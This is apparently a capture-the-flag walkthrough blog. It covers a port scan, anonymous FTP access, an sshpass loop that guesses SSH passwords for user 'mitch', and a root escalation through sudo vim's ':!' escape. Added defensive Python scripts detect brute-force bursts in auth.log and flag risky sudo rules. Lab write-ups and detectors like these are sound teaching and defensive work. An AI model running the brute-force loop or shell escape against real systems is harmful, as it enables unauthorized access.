Files used in this blog are here
Port scan
First we start by scanning all the ports:
nmap -p- -T4 --min-rate 5000 -vvv -o fullscan 10.10.226.232
-p-
means all 65535 TCP ports (the same as -p1-65535)
-T4
is the aggressive timing template
--min-rate 5000
tells nmap to send at least that many packets per second
-vvv
is extra verbose
-o fullscan
writes the normal output to the file fullscan (nmap's documented spelling of this option is -oN)
# Nmap 7.80 scan initiated Fri Feb 16 00:10:54 2024 as: nmap -p- -T4 --min-rate 5000 -vvv -o fullscan 10.10.226.232
Nmap scan report for 10.10.226.232 (10.10.226.232)
Host is up, received syn-ack (0.27s latency).
Scanned at 2024-02-16 00:10:54 -03 for 42s
Not shown: 65532 filtered ports
Reason: 65532 no-responses
PORT STATE SERVICE REASON
21/tcp open ftp syn-ack
80/tcp open http syn-ack
2222/tcp open EtherNetIP-1 syn-ack
Read data files from: /usr/bin/../share/nmap
# Nmap done at Fri Feb 16 00:11:36 2024 -- 1 IP address (1 host up) scanned in 41.57 seconds
FTP Anonymous login
Now, since port 21 is open, we can try an anonymous login.
ftp 10.10.226.232
Connected to 10.10.226.232.
220 (vsFTPd 3.0.3)
Name (10.10.226.232:user): anonymous
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp>
Now we are inside! We can verify by running a command like ls
ftp> ls
200 EPRT command successful. Consider using EPSV.
150 Here comes the directory listing.
drwxr-xr-x 2 ftp ftp 4096 Aug 17 2019 pub
226 Directory send OK.
ftp>
If the listing hangs with a passive-mode message, just type passive
to switch the client to active mode.
If we dig inside the folder pub
there is a file called ForMitch.txt.
We download it with get <file_name>
and on our local computer we do a cat <file_name>.
We got the following response
Dammit man... you'te the worst dev i've seen. You set the same pass for the system user, and the password is so weak... i cracked it in seconds. Gosh... what a mess!
Brute force
So we know that the same account exists on the system and that its password is weak.
Since the message mentions a name, we are going to assume that the user is mitch; now we should try to brute force the password.
I'm going to use a package called sshpass
in order to send each password from a wordlist that I got from the internet, with a simple script like this:
#!/bin/bash
# Read the wordlist line by line (quoted, so passwords with spaces survive)
while IFS= read -r password; do
    echo "Trying password: $password"
    # Run a no-op command instead of opening a shell; exit status 0 means the login worked
    if sshpass -p "$password" ssh -p 2222 -o StrictHostKeyChecking=no -o IdentitiesOnly=yes -o ConnectTimeout=5 mitch@10.10.226.232 true 2>/dev/null; then
        echo "Password found: $password"
        break
    fi
done < weak_passwords.txt
After a long time trying I got the password!
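A password-guessing loop like the one above leaves a very recognisable trail in the target's sshd log: a run of "Failed password" lines from one source address, often followed by an "Accepted password" for the same user. The Python script below is an added example, not part of the original post; it parses a constructed sample of /var/log/auth.log lines and flags both the failure burst and a success that follows one. The hostname "target", the addresses, the threshold and the window are assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample of /var/log/auth.log lines (not captured from the post's host).
# 10.10.14.7 fails repeatedly for mitch and then logs in: the footprint of a
# password-guessing loop. 192.0.2.9 is a single failure, 198.51.100.4 a normal key login.
SAMPLE_AUTH_LOG = """\
Feb 16 00:20:01 target sshd[1201]: Failed password for mitch from 10.10.14.7 port 51110 ssh2
Feb 16 00:20:02 target sshd[1203]: Failed password for mitch from 10.10.14.7 port 51112 ssh2
Feb 16 00:20:03 target sshd[1205]: Failed password for mitch from 10.10.14.7 port 51114 ssh2
Feb 16 00:20:04 target sshd[1207]: Failed password for mitch from 10.10.14.7 port 51116 ssh2
Feb 16 00:20:05 target sshd[1209]: Failed password for mitch from 10.10.14.7 port 51118 ssh2
Feb 16 00:20:07 target sshd[1211]: Accepted password for mitch from 10.10.14.7 port 51120 ssh2
Feb 16 00:21:40 target sshd[1300]: Failed password for invalid user admin from 192.0.2.9 port 40022 ssh2
Feb 16 00:25:00 target sshd[1350]: Accepted publickey for deploy from 198.51.100.4 port 60000 ssh2
"""

LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d{1,2} \d{2}:\d{2}:\d{2}) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) (?P<method>password|publickey) for (?:invalid user )?"
    r"(?P<user>\S+) from (?P<src>\S+) port \d+"
)


def parse_events(text):
    """Turn sshd auth lines into (timestamp, source, user, accepted) tuples."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # not an authentication result line
        ts = datetime.strptime(m["ts"], "%b %d %H:%M:%S")  # year-less syslog stamp
        events.append((ts, m["src"], m["user"], m["result"] == "Accepted"))
    return events


def detect_bruteforce(text, threshold=5, window_seconds=60):
    """Return findings per source: a failure burst, and a success right after one."""
    per_source = defaultdict(list)
    for ev in parse_events(text):
        per_source[ev[1]].append(ev)

    findings = []
    window = timedelta(seconds=window_seconds)
    for src, evs in per_source.items():
        evs.sort()
        recent_failures = []  # timestamps of failures still inside the window
        burst_reported = False
        for ts, _, user, accepted in evs:
            recent_failures = [t for t in recent_failures if ts - t <= window]
            if accepted:
                # A login that lands on top of a failure burst is the strongest signal
                if len(recent_failures) >= threshold:
                    findings.append(("success-after-burst", src, user, len(recent_failures)))
                recent_failures = []
            else:
                recent_failures.append(ts)
                if len(recent_failures) >= threshold and not burst_reported:
                    findings.append(("burst", src, user, len(recent_failures)))
                    burst_reported = True
    return findings


if __name__ == "__main__":
    for kind, src, user, count in detect_bruteforce(SAMPLE_AUTH_LOG):
        print(f"{kind}: {count} failures from {src} for user {user}")
```

The "success-after-burst" finding is the one worth paging on: a burst alone may be a misconfigured client, but a burst that ends in an accepted password login is what the script in this post produces on the target.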
Obtain the flags
If we do an ls
we can see that the user.txt
flag is there; take it and continue!
One of the first things you should always do on a system (even before trying tools like linpeas) is a simple sudo -l
to see if there is something that can be run with sudo.
$ sudo -l
User mitch may run the following commands on Machine:
(root) NOPASSWD: /usr/bin/vim
And of course there it is: we can use sudo vim.
Let's do a sudo vim,
then type :
followed by ! ls /root
and press Enter; with this we are going to see if the root flag is there.
$ sudo vim
root.txt
And there it is! Do the same as before, but this time with ! cat /root/root.txt
Congratulations you got your flag!
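From the defender's side, the rule (root) NOPASSWD: /usr/bin/vim is exactly what a sudoers review should catch before anyone runs sudo -l on the box. The Python below is an added example, not from the original post: it parses sudo -l style output (a constructed sample containing the post's rule plus two contrasting rules) and flags root rules for editors that can run shell commands unless sudo's NOEXEC tag is set. SHELL_ESCAPE_PROGRAMS is an assumption limited to the editor the post uses; extend it from your own policy.

```python
import re
from pathlib import PurePosixPath

# Constructed `sudo -l` output, not captured from the original post's host.
# The first rule is the one the post found; the other two are added for contrast.
SAMPLE_SUDO_L = """\
User mitch may run the following commands on Machine:
    (root) NOPASSWD: /usr/bin/vim
    (root) NOEXEC: /usr/bin/vim
    (root) /usr/bin/systemctl restart nginx
"""

# Assumed list: programs whose ':!' escape the post demonstrates. vi is usually
# the same binary as vim on modern systems.
SHELL_ESCAPE_PROGRAMS = {"vim", "vi"}

# "(runas) [TAG: ...] command args"
RULE_RE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?P<rest>\S.*)$")


def parse_rules(text):
    """Return (runas, tags, command) for each command line of `sudo -l` output."""
    rules = []
    for line in text.splitlines():
        m = RULE_RE.match(line)
        if not m:
            continue  # header or Defaults line
        tokens = m["rest"].split()
        tags = set()
        # Tags such as NOPASSWD: or NOEXEC: precede the command and end with ':'
        while tokens and tokens[0].endswith(":") and tokens[0][:-1].isupper():
            tags.add(tokens.pop(0)[:-1])
        rules.append((m["runas"].strip(), tags, " ".join(tokens)))
    return rules


def audit_sudo_rules(text):
    """Flag rules that let a user run a shell-capable editor as root without NOEXEC."""
    findings = []
    for runas, tags, command in parse_rules(text):
        # "(root)" or "(ALL : ALL)": look only at the user part before ':'
        runas_users = {u.strip() for u in runas.split(":")[0].split(",")}
        if not runas_users & {"root", "ALL"}:
            continue
        program = PurePosixPath(command.split()[0]).name
        if program in SHELL_ESCAPE_PROGRAMS and "NOEXEC" not in tags:
            findings.append({
                "command": command,
                "nopasswd": "NOPASSWD" in tags,
                "issue": f"{program} as root without NOEXEC: ':!' drops to a root shell",
            })
    return findings


if __name__ == "__main__":
    for f in audit_sudo_rules(SAMPLE_SUDO_L):
        flag = " (no password required)" if f["nopasswd"] else ""
        print(f"{f['command']}{flag}: {f['issue']}")
```

NOEXEC stops the :! escape because sudo blocks the editor from executing other programs, but an editor running as root can still read and write any file, so the better fix is a narrower grant such as sudoedit on the one file the user actually needs to change.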